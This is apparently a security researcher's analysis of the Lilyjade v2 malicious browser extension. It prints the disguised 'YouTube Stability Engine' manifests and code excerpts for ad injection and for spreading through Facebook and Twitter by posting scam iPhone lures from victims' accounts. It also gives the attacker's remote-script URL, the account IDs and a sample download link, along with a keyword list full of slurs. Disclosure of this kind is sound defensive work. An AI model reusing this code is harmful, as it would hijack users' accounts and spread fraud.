lilyjadev2.com (Malicious browser extension Hosted in the United States by Endicott H4y Technologies Llc)

After posting the latest browser extension malware, I decided to check up on the first posted on the site, Lilyjade. While all of the reported hosts had been shutdown, I located a new one, which claimed to host Lilyjade version 2

Here’s a look at the new version of the Lilyjade malware

The first change is the lack of crossrider. While the first version used the cross browser extension framework to provide extensions for both Chrome and Firefox, v2 takes a different approach to each browser.
The Chrome extension is hosted and updated off of dropbox. There are no signs that indicate that it has been created by a cross browser extension site.

{
   "manifest_version": 2,
   "content_scripts": [ {
      "all_frames": true,
      "js": [ "go.js" ],
      "matches": [ "u003Call_urlsu003E" ]
   } ],
   "description": "Required System Extension",
   "icons": {
      "128": "icon128.png",
      "16": "icon16.png",
      "48": "icon48.png"
   },
   "background": {
    "scripts": ["background.js"]
   },
   "name": "YouTube Stability Engine",
   "permissions": [ "<all_urls>" , "unlimitedStorage", "tabs"],
  "version": "2.6.0",
  "update_url": "http://dl.dropbox.com/u/64537922/lj/update.xml"
}

The Firefox extension is much larger, and appears to be the Chrome extension converted using extensionfactory.com, which added a wrapper to run the Chrome extension on Firefox. The main extension code remains the same as the Chrome extension

 <Description about="urn:mozilla:install-manifest">
    <em:name>YouTube Stability Engine</em:name>
    <em:unpack>true</em:unpack>
    <em:bootstrap>true</em:bootstrap>
    <em:updateURL>https://gallery.extensionfactory.com/labs/conversion/update/miophknchcebolnhaahfcolbccopgaga/</em:updateURL>
    <em:version>2.6.0</em:version>
    <em:targetApplication>
      <Description>
        <em:minVersion>4.0</em:minVersion>
        <em:maxVersion>99.*</em:maxVersion>
        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
      </Description>
    </em:targetApplication>
    <em:type>2</em:type>
    <em:id>miophknchcebolnhaahfcolbccopgaga@slicefactory.com</em:id>
    <em:description>Required System Extension</em:description>
  </Description>

The main part of the extension is the background.js file, which downloads and runs a javascript file from the control panel.
For this version of Lilyjade, the file is located at

http://lilyjadev2.com/panel/cache/6ad01eb4c2c1405636a6b85678506e8d.js

.
This script contains the code neccessary for replacing ads, posting on facebook and twitter and the analytics code for tracking the number of infected browsers.

function loadWidget(id, callback) {
    $LAB.setOptions({
        AppendTo: "body"
    }).script({
        charset: "utf-8",
        type: "text/javascript",
        src: "http://ws.amazon.com/widgets/q?ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/enz-20/8001/25a54e74-2ee7-4e6c-8e3c-bd913fdcec00"
    }).block(function () {
        renderMarkup($$(id), callback);
    });
}

function loadAnalytics(id, callback) {
    var gaJsHost = (("https:" === document.location.protocol) ? "https://ssl." : "http://www.");
    $LAB.setOptions({
        AppendTo: "body"
    }).script({
        type: "text/javascript",
        src: gaJsHost + "google-analytics.com/ga.js"
    }).block(function () {
        renderMarkup($$(id), function () {
            try {
                var pageTracker = window._gat._getTracker("UA-10493018-2");
                pageTracker._trackPageview();
            } catch (err) {}
            callback();
        });
    });
}

The ad replacing code has a simplistic filter that checks the domain name of the visited site for adult terms, in an attempt to avoid the suspension of the adsense account.

function replaceAd(w, h, aid, rand) {
    if (w != null && h != null && aid != null && rand != null) {
        windowOnload();
        captureOnloadListeners();
        window.onload = null;
        captureMarkup();
        window.setTimeout(function () {
            loadAds(rand, w, h, "ca-pub-8295585119185751", aid);
        }, 250);
    } else {
        if (!domainMatch("*ahole*", "*anus*", "*ash0le*", "*ash0les*", "*asholes*", "*ass*", "*Ass Monkey*", "*Assface*", "*assh0le*", "*assh0lez*", "*asshole*", "*assholes*", "*assholz*", "*asswipe*", "*azzhole*", "*bassterds*", "*bastard*", "*bastards*", "*bastardz*", "*basterds*", "*basterdz*", "*Biatch*", "*bitch*", "*bitches*", "*Blow Job*", "*boffing*", "*butthole*", "*buttwipe*", "*c0ck*", "*c0cks*", "*c0k*", "*Carpet Muncher*", "*cawk*", "*cawks*", "*Clit*", "*cnts*", "*cntz*", "*cock*", "*cockhead*", "*cock-head*", "*cocks*", "*CockSucker*", "*cock-sucker*", "*crap*", "*cum*", "*cunt*", "*cunts*", "*cuntz*", "*dick*", "*dild0*", "*dild0s*", "*dildo*", "*dildos*", "*dilld0*", "*dilld0s*", "*dominatricks*", "*dominatrics*", "*dominatrix*", "*dyke*", "*enema*", "*f u c k*", "*f u c k e r*", "*fag*", "*fag1t*", "*faget*", "*fagg1t*", "*faggit*", "*faggot*", "*fagit*", "*fags*", "*fagz*", "*faig*", "*faigs*", "*fart*", "*flipping the bird*", "*fuck*", "*fucker*", "*fuckin*", "*fucking*", "*fucks*", "*Fudge Packer*", "*fuk*", "*Fukah*", "*Fuken*", "*fuker*", "*Fukin*", "*Fukk*", "*Fukkah*", "*Fukken*", "*Fukker*", "*Fukkin*", "*g00k*", "*gay*", "*gayboy*", "*gaygirl*", "*gays*", "*gayz*", "*God-damned*", "*h00r*", "*h0ar*", "*h0re*", "*hells*", "*hoar*", "*hoor*", "*hoore*", "*jackoff*", "*jap*", "*japs*", "*jerk-off*", "*jisim*", "*jiss*", "*jizm*", "*jizz*", "*knob*", "*knobs*", "*knobz*", "*kunt*", "*kunts*", "*kuntz*", "*Lesbian*", "*Lezzian*", "*Lipshits*", "*Lipshitz*", "*masochist*", "*masokist*", "*massterbait*", "*masstrbait*", "*masstrbate*", "*masterbaiter*", "*masterbate*", "*masterbates*", "*Motha Fucker*", "*Motha Fuker*", "*Motha Fukkah*", "*Motha Fukker*", "*Mother Fucker*", "*Mother Fukah*", "*Mother Fuker*", "*Mother Fukkah*", "*Mother Fukker*", "*mother-fucker*", "*Mutha Fucker*", "*Mutha Fukah*", "*Mutha Fuker*", "*Mutha Fukkah*", "*Mutha Fukker*", "*n1gr*", "*nastt*", "*nigger;*", "*nigur;*", "*niiger;*", "*niigr;*", "*orafis*", "*orgasim;*", "*orgasm*", "*orgasum*", "*oriface*", "*orifice*", "*orifiss*", "*packi*", "*packie*", "*packy*", "*paki*", "*pakie*", "*paky*", "*pecker*", "*peeenus*", "*peeenusss*", "*peenus*", "*peinus*", "*pen1s*", "*penas*", "*penis*", "*penis-breath*", "*penus*", "*penuus*", "*Phuc*", "*Phuck*", "*Phuk*", "*Phuker*", "*Phukker*", "*polac*", "*polack*", "*polak*", "*Poonani*", "*pr1c*", "*pr1ck*", "*pr1k*", "*pusse*", "*pussee*", "*pussy*", "*puuke*", "*puuker*", "*queer*", "*queers*", "*queerz*", "*qweers*", "*qweerz*", "*qweir*", "*recktum*", "*rectum*", "*retard*", "*sadist*", "*scank*", "*schlong*", "*screwing*", "*semen*", "*sex*", "*sexy*", "*Sh!t*", "*sh1t*", "*sh1ter*", "*sh1ts*", "*sh1tter*", "*sh1tz*", "*shit*", "*shits*", "*shitter*", "*Shitty*", "*Shity*", "*shitz*", "*Shyt*", "*Shyte*", "*Shytty*", "*Shyty*", "*skanck*", "*skank*", "*skankee*", "*skankey*", "*skanks*", "*Skanky*", "*slut*", "*sluts*", "*Slutty*", "*slutz*", "*son-of-a-bitch*", "*tit*", "*turd*", "*va1jina*", "*vag1na*", "*vagiina*", "*vagina*", "*vaj1na*", "*vajina*", "*vullva*", "*vulva*", "*w0p*", "*wh00r*", "*wh0re*", "*whore*", "*xrated*", "*xxx*", "*b!+ch*", "*bitch*", "*blowjob*", "*clit*", "*arschloch*", "*fuck*", "*shit*", "*ass*", "*asshole*", "*b!tch*", "*b17ch*", "*b1tch*", "*bastard*", "*bi+ch*", "*boiolas*", "*buceta*", "*c0ck*", "*cawk*", "*chink*", "*cipa*", "*clits*", "*cock*", "*cum*", "*cunt*", "*dildo*", "*dirsa*", "*ejakulate*", "*fatass*", "*fcuk*", "*fuk*", "*fux0r*", "*hoer*", "*hore*", "*jism*", "*kawk*", "*l3itch*", "*l3i+ch*", "*lesbian*", "*masturbate*", "*masterbat*", "*masterbat3*", "*motherfucker*", "*s.o.b.*", "*mofo*", "*nazi*", "*nigga*", "*nigger*", "*nutsack*", "*phuck*", "*pimpis*", "*pusse*", "*pussy*", "*scrotum*", "*sh!t*", "*shemale*", "*shi+*", "*sh!+*", "*slut*", "*smut*", "*teets*", "*tits*", "*boobs*", "*b00bs*", "*teez*", "*testical*", "*testicle*", "*titt*", "*w00se*", "*jackoff*", "*wank*", "*whoar*", "*whore*", "*damn*", "*dyke*", "*fuck*", "*shit*", "*@$$*", "*amcik*", "*andskota*", "*arse*", "*assrammer*", "*ayir*", "*bi7ch*", "*bitch*", "*bollock*", "*breasts*", "*butt-pirate*", "*cabron*", "*cazzo*", "*chraa*", "*chuj*", "*Cock*", "*cunt*", "*d4mn*", "*daygo*", "*dego*", "*dick*", "*dike*", "*dupa*", "*dziwka*", "*ejackulate*", "*Ekrem*", "*Ekto*", "*enculer*", "*faen*", "*fag*", "*fanculo*", "*fanny*", "*feces*", "*feg*", "*Felcher*", "*ficken*", "*fitt*", "*Flikker*", "*foreskin*", "*Fotze*", "*fuk*", "*futkretzn*", "*gay*", "*gook*", "*guiena*", "*h0r*", "*h4x0r*", "*hell*", "*helvete*", "*hoer*", "*honkey*", "*Huevon*", "*hui*", "*injun*", "*jizz*", "*kanker*", "*kike*", "*klootzak*", "*kraut*", "*knulle*", "*kuk*", "*kuksuger*", "*Kurac*", "*kurwa*", "*kusi*", "*kyrpa*", "*lesbo*", "*mamhoon*", "*masturbat*", "*merd*", "*mibun*", "*monkleigh*", "*mouliewop*", "*muie*", "*mulkku*", "*muschi*", "*nazis*", "*nepesaurio*", "*nigger*", "*orospu*", "*paska*", "*perse*", "*picka*", "*pierdol*", "*pillu*", "*pimmel*", "*piss*", "*pizda*", "*poontsee*", "*poop*", "*porn*", "*p0rn*", "*pr0n*", "*preteen*", "*pula*", "*pule*", "*puta*", "*puto*", "*qahbeh*", "*queef*", "*rautenberg*", "*schaffer*", "*scheiss*", "*schlampe*", "*schmuck*", "*screw*", "*sh!t*", "*sharmuta*", "*sharmute*", "*shipal*", "*shiz*", "*skribz*", "*skurwysyn*", "*sphencter*", "*spic*", "*spierdalaj*", "*splooge*", "*suka*", "*b00b*", "*testicle*", "*titt*", "*twat*", "*vittu*", "*wank*", "*wetback*", "*wichser*", "*wop*", "*yed*", "*zabourah*")) {
            initWindow();
            FacebookSpread();
            TwitterSpread();
        }
    }
}

There also appears to be a function for replacing amazon widgets with one coded into the extension.
The facebook posting has expanded out into liking pages and creating events as well as posting onto the wall of the affected account.
The twitter spread simply tweets the selected message from the affected account.

Controlling these functions is done from the javascript, with the spreading terms and selected options coded into the file. The panel appears to simply modify the .js file, which could done easily by hand if anyone was enclined to use lilyjade for free.

var aduse = 1;
var spreaduse = 1;
var likeuse = 1;
var eventuse = 1;
var tweetuse = 1;
var htmlsrc = "";
var ROOTSERVER = "lilyjadev2.com";

function FacebookSpread() {
    if ((document.domain).toLowerCase() == "facebook.com" && isFacebook()) {
        if (getCookie("spread") == null) {
            if (likeuse == 1) likePage();
            if (spreaduse == 1) sharePage("http://i.imgur.com/yW4BA.jpg", "http://faecbook.nazuka.net/pop.html", "iPhone 5 beta for Free!!!", "At last The Beta of iPhone 5 is out!", "Here's your chance to get the iPhone 5 beta for free! Go to : http://j.gs/868755/iphone5", "30713015083");
            if (eventuse == 1) createEvent("Free Youtube Goodies, Tshirts and more!", "Youtube is giving out cool stuff like tshirts,watches and much more! Take yours from here http://faecbook.nazuka.net");
            setCookie("spread", "active", 1);
        }
    }
}

The Adsense account affiliated with the extension is

ca-pub-8295585119185751

The Google Analytics account is

UA-10493018-2

The Amazon widget account is

25a54e74-2ee7-4e6c-8e3c-bd913fdcec00

The Dropbox account used for update checks and distributing the extension is

/u/64537922/

(This account has been used in the past to distribute malware)

The website used for the current spreading campaign is

http://faecbook.nazuka.net

Download containing the both extensions and the current 6ad01eb4c2c1405636a6b85678506e8d.js file: Download
Hosting info: http://whois.domaintools.com/199.83.213.170